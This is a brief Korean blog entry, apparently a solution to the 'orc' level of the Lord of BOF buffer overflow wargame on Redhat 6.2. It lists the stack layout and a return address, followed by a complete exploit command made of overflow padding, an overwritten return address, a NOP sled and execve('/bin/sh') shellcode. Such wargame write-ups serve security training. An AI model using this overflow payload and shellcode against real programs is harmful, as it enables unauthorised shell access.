goblin - egghunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc01
Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using buffer address
'Wargames > Load Of BOF' 카테고리의 다른 글
| LOB Redhat 6.2 - wolfman (0) | 2015.10.24 |
|---|---|
| LOB Redhat 6.2 - orc (0) | 2015.10.24 |
| LOB Redhat 6.2 - cobolt (0) | 2015.10.23 |
| LOB Redhat 6.2 - gremlin (0) | 2015.10.23 |
| LOB Redhat 6.2 - gate (0) | 2015.10.22 |
